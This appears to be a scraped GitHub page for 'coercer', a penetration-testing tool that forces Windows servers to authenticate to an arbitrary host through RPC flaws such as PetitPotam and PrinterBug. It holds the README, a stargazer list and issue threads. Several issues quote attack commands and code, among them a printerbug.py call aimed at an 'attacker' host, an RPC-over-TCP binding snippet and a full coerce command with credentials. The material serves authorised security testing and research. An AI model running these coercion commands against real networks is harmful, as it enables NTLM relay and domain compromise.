p0dalirius / coercer Goto Github PK

View Code? Open in Web Editor NEW

1.6K 22.0 175.0 11.32 MB

A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.

Home Page: https://podalirius.net/

License: GNU General Public License v2.0

Python 99.63% Makefile 0.37%

authentication automatic call coerce privilege-escalation rpc ntlm fuzzing

coercer's Introduction

A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.

Features

Core:
- Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated)
- Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated)
- Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
- Random UNC paths generation to avoid caching failed attempts (all modes)
- Configurable delay between attempts with --delay
Options:
- Filter by method name with --filter-method-name, by protocol name with --filter-protocol-name or by pipe name with --filter-pipe-name (all modes)
- Target a single machine --target or a list of targets from a file with --targets-file
- Specify IP address OR interface to listen on for incoming authentications. (modes scan and fuzz)
Exporting results
- Export results in SQLite format (modes scan and fuzz)
- Export results in JSON format (modes scan and fuzz)
- Export results in XSLX format (modes scan and fuzz)

Installation

You can now install it from pypi (latest version is ) with this command:

sudo python3 -m pip install coercer

Quick start

You want to assess the Remote Procedure Calls listening on a machine to see if they can be leveraged to coerce an authentication?
- Use scan mode, example:
demo-scan.mp4
You want to exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder?
- Use coerce mode, example:
demo-coerce.mp4
You are doing research and want to fuzz Remote Procedure Calls listening on a machine with various paths?
- Use fuzz mode, example:
demo-fuzz.mp4

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

Credits

@tifkin_ and @elad_shamir for finding and implementing PrinterBug on MS-RPRN
@topotam77 for finding and implementing PetitPotam on MS-EFSR
@topotam77 for finding and @_nwodtuhs for implementing ShadowCoerce on MS-FSRVP
@filip_dragovic for finding and implementing DFSCoerce on MS-DFSNM
@evilashz for finding and implementing CheeseOunce on MS-EVEN

coercer's People

Contributors

Stargazers

Watchers

Forkers

askyeye gavz codyjohnston timb-machine-mirrors zzhsec swzhouu 482949203 ondrik8 crispud phuong39 419066074 jodiskripe abramas nicbrinkley 0xrobert shyftxero beerandgin dannymas rvrsh3ll pwnf aidasdir jayaram-yalla rtforks jakuta-tech clayne nanaao invokethreatguy wisdark reydecopas 30579096 charnim angeltg83 fullstackinfo shoxxdj hyperbeats sirwomble cybersecops cbk914 jlexposito toxicnade offsecguy lefrancjeremy aben1979 nocomp shadowsector7 jenaye killvxk 0xsojalsec djmikebet mikusher mlynchcogent stanhardy marin-kitagawa 5l1v3r1 ikpehlivan svchost9913 slooppe tire-fire hxlxmjxbbxs th3blackp3arl cutff 5m7x raleigh2016 pdolinic 0xajstrike dlaflotte caustickirbyz stoicmehedi xcalibure2 sweetpastabox 3m1za4 unleashedmen akatorich cesarsilence cokonas htts3at kingofthebeat samy4samy syh4ck 3mr3-sec badguy0827 luton15071 xtenex srand2 lennon-mawele noobosaurus-r3x hdys0vn takianfif mohinparamasivam bemonolit reket99 baserak devendrasuthar jackpot777 hacker-r3volv3r justinforbes gdraperi gg-big-org cvlabsio gmh5225

coercer's Issues

Fix MS-PAR and MS-RPRN authentications

[enchancement] Finish feature to specify listener port

As discussed before, there are these args existing :

Advanced configuration:
  --delay DELAY         Delay between attempts (in seconds)
  --http-port HTTP_PORT
                        HTTP port (default: 80)
  --smb-port SMB_PORT   SMB port (default: 445)

This issue is just to remind you to make sure everything is working on this side 😄 to be sure you can specify another for SMB coerce and WebDav too !

[enhancement] Add MS-EVEN methods (CheeseOunce)

https://github.com/evilashz/CheeseOunce

[enhancement] Add ProxyLogon coerce methods

[enhancement] Adding MS-EVEN - ElfrOpenBELW (opnum 9) method

[enhancement] Adding MS-EFSR - EfsRpcDuplicateEncryptionInfoFile (opnum 13) method

[enhancement] Support access to SMB over NetBIOS (139/tcp)

Hello.
Coercing via 139/tcp port like a:

nmblookup 10.0.0.10
echo 10.0.0.10 TARGET >> /etc/hosts
python printerbug.py -port 139 domain/user@TARGET attacker

[enhancement] Add WSPCoerce

See https://github.com/slemire/WSPCoerce

Thanks for the awesome tool :)

[enhancement] Add PrivExchange

It is only relevant for exchange servers: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
If you want to keep the core checks clean from application specific checks that may only work on a small subset of hosts, you may consider to add a switch for extended checks that contains stuff like this or so... I expect the future to bring a lot more of these

[enhancement] Support access to SMB over QUIC (Windows 11 & Windows Server 2022)

Hi,

I see you are planning to add more coercing methods in version 2.0 which is great! Have you heard about NTLMQUIC available and running by default on Windows 11 and Windows Server 2022? TrustedSec describes this in this post and their tools are available here.

Apparently PetitPotam can be used to coerce NTLMQUIC but that also involves additional tools which is not very clean. Is it at all possible to improve this so that all that is needed to coerce NTLMQUIC is your tool? If so, would you be willing to support this?

Thanks!

[enhancement] Adding MS-FSRVP - IsPathSupported (opnum 8) method

[enhancement] Add setup.py installer

[enhancement] Adding MS-EFSR - EfsRpcAddUsersToFileEx (opnum 15) method

[enhancement] Adding MS-EFSR - EfsRpcOpenFileRaw (opnum 0) method

[enhancement] Adding MS-RPRN - RemoteFindFirstPrinterChangeNotificationEx (opnum 65) method

[enhancement] Adding MS-EFSR - EfsRpcQueryUsersOnFile (opnum 6) method

[enhancement] Add server sink and reporting

[enhancement] Add documentation of classes and functions in coercer

https://pdoc3.github.io/pdoc/

[bug] Kerberos authentification

Kerberos auth. doesn't seem to be implemented?

[enhancement] Support access to RPC over TCP/IP (ncacn_ip_tcp)

Hello.
When 445 and 139 ports closed, we have still can coerce via DCERPC (4915x/tcp):

stringBinding = r'ncacn_ip_tcp:%s[%d]' % (target,port)
rpctransport = transport.DCERPCTransportFactory(stringBinding)
portmap = rpctransport.get_dce_rpc()
portmap.set_credentials(USERNAME, PASSWORD, DOMAIN, "", "", None)
portmap.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
portmap.connect()
portmap.bind(UUID)

[bug] Option --filter-pipe-name not working

[enhancement] Adding MS-EFSR - EfsRpcQueryRecoveryAgents (opnum 7) method

[enhancement] Add message if we cannot listen in scan mode (not root or other server running?)

[enhancement] Adding MS-FSRVP - IsPathShadowCopied (opnum 9) method

[enhancement] Adding MS-EFSR - EfsRpcDecryptFileSrv (opnum 5) method

[bug] SMB SessionError: STATUS_PIPE_DISCONNECTED

Hi,

I love your tool and I have used it a lot! However, today during testing in my AD lab I suddenly get the error "SMB SessionError: STATUS_PIPE_DISCONNECTED" when attempting to coerce anonymously.

Anonymous coercing has worked before. If I try authenticated coercing against the same DC it partially works. Also note that coercing using MS-RPRN.exe, and I assume authentication via Kerberos, against the same DC still works... As you can see the pipe LSARPC is accessible.

Restarting dc1.adlab.local (10.0.0.200) does not help.

[bug] Got "too many values to unpack" while trying to scan

The problem is in rpc.py:26
_transport, dst = binding.split(":")
one of binding was "ncalrpc:[PRRUniversal#4FAF6D748C97387A:3684]" what causes that error
Fixed with limiting split func to 1 occurence: _transport, dst = binding.split(":", 1)

[enhancement] Add message to explicitly say when user is not authenticated

[enhancement] Add option to choose a specific method / protocol

[bug] TypeError: NetrDfsAddStdRoot.trigger() takes 2 positional arguments but 3 were given

[+] SMB named pipe '\PIPE\netdfs' is accessible!
   [+] Successful bind to interface (4fc742e0-4a10-11cf-8273-00aa004ae673, 3.0)!
      [>] (-testing-) MS-DFSNM──>NetrDfsAddStdRoot(ServerName='\\192.168.1.27\ujbjOnpm\file.txt\x00') 
Traceback (most recent call last):
  File "/data/git_projects/Coercer/./Coercer.py", line 11, in <module>
    main()
  File "/data/git_projects/Coercer/coercer/__main__.py", line 189, in main
    action_coerce(target, available_methods, options, credentials, reporter)
  File "/data/git_projects/Coercer/coercer/core/modes/coerce.py", line 97, in action_coerce
    result = trigger_authentication(
  File "/data/git_projects/Coercer/coercer/network/authentications.py", line 74, in trigger_authentication
    result_trigger = method_trigger_function(dcerpc_session, target)
TypeError: NetrDfsAddStdRoot.trigger() takes 2 positional arguments but 3 were given```

[enhancement] Add option --stop-at-first-working-call

[enhancement] Check that credentials are valid before trying to coerce

[bug] Coercing through ElfrOpenBELW in \PIPE\eventlog doesn't work.

[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\192.168.1.101\r1Qr8iIe\aa')

[bug] HTTP Authentications works in ntlmrelay from Coercer in coerce mode, but not detected by Coercer in scan and fuzz modes

HTTP Authentications works in ntlmrelay

ntlmrelay.mp4

but not detected by Coercer in scan and fuzz modes

Follow up on #40 by @jsdhasfedssad

Add support for webdav authentications

[enhancement] Adding MS-EFSR - EfsRpcEncryptFileSrv (opnum 4) method

[enhancement] Adding MS-DFSNM - NetrDfsAddStdRoot (opnum 12) method

[enhancement] \PIPE\efsrpc interface

Hello.
Currently coercer supports the following rpc interfaces:

/opt/Coercer/coercer/protocols(master) » grep -r uuid
MS_EFSR.py:    uuid = "c681d488-d850-11d0-8c52-00c04fd90f7e"
MS_FSRVP.py:    uuid = "a8e0653c-2744-4389-a61d-7373df8b2292"
MS_RPRN.py:    uuid = "12345678-1234-ABCD-EF00-0123456789AB"
MS_DFSNM.py:    uuid = "4fc742e0-4a10-11cf-8273-00aa004ae673"

However there is exists one more interface (in PetitPotam):

            'efsr': {
                'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
                'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
            },

[bug] F821 undefined name 'ncan_target'

./coercer/network/DCERPCSession.py:36:52: F821 undefined name 'ncan_target'
            print("   [>] Connecting to %s ... " % ncan_target, end="")
                                                   ^
1     F821 undefined name 'ncan_target'

[bug] Is the Coercer application platform dependent?

I'm trying to run Coercer on Windows but I'm facing with an error:

ModuleNotFoundError: No module named 'fcntl'

Found this question rror-no-module-named-fcntl.

Python 3.9.11 (tags/v3.9.11:2de452f, Mar 16 2022, 14:33:45) [MSC v.1929 64 bit (AMD64)] on win32

> pip list
Package            Version
------------------ -------
cffi               1.15.1
chardet            5.1.0
click              8.1.3
coercer            2.4
colorama           0.4.6
cryptography       39.0.0
dnspython          2.2.1
Flask              2.2.2
future             0.18.2
impacket           0.10.0
importlib-metadata 6.0.0
itsdangerous       2.1.2
Jinja2             3.1.2
ldap3              2.9.1
ldapdomaindump     0.9.4
MarkupSafe         2.1.1
pip                22.3.1
pyasn1             0.4.8
pycparser          2.21
pycryptodomex      3.16.0
pyOpenSSL          23.0.0
setuptools         65.6.3
six                1.16.0
Werkzeug           2.2.2
wheel              0.38.4
XlsxWriter         3.0.6
zipp               3.11.0

[bug] UnboundLocalError: cannot access local variable 'portmap' where it is not associated with a value

--filter-transport-name msrpc

Command:

coercer coerce -t 192.168.1.11 --auth-type http -u Administrator -p 'Admin123!' -l 192.168.1.27 --always-continue --filter-pipe-name lsarpc --filter-transport-name msrpc

root@THOR:/home/podalirius# coercer coerce -t 192.168.1.11 --auth-type http -u Administrator -p 'Admin123!' -l 192.168.1.27 --always-continue --filter-pipe-name lsarpc --filter-transport-name msrpc
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target 192.168.1.11
Traceback (most recent call last):
  File "/usr/local/bin/coercer", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/coercer/__main__.py", line 201, in main
    action_coerce(target, available_methods, options, credentials, reporter)
  File "/usr/local/lib/python3.11/dist-packages/coercer/core/modes/coerce.py", line 65, in action_coerce
    for port in options.dce_ports or portmap.get("ncacn_ip_tcp",{}).get("%s v%s"%(uuid.upper(),version),[]):
                                     ^^^^^^^
UnboundLocalError: cannot access local variable 'portmap' where it is not associated with a value

[enhancement] Adding MS-DFSNM - NetrDfsRemoveStdRoot (opnum 13) method

[enhancement] Refactor the code base to simplify adding new calls

[enhancement] Adding --filter-pipe-name to filter on SMB named pipes names

Adding --filter-pipe-name to filter on SMB named pipes names

[bug] module 'coercer.protocols.MS_EFSR' has no attribute 'DCERPCSessionError'

[enhancement] Add option to automatically continue in coerce mode

[bug] Coercing HTTP to SMB no longer available in version 2.1

Hi again!

You know I love your tool but today when I was attempting to trigger HTTP to SMB authentication using the new version I noticed that the parameter "--webdav-host" no longer exists. I tested to use the NetBIOS name of Responder as input to the parameter "--target" but that only triggered a SMB to SMB authentication.

Yes the role WebDAV was installed on the target DC and the service WebClient was running.

Is there any way to trigger HTTP to SMB authentication in version 2.1? If not I am forced to go back to version 1.6.

Thanks!

[enhancement] Adding MS-EFSR - EfsRpcFileKeyInfo (opnum 12) method

Add SpoolSample

Amazing tool.

I didn't see SpoolSample in the list which could be useful to add.

Some implementation are below:

https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
https://github.com/BeetleChunks/SpoolSploit
https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc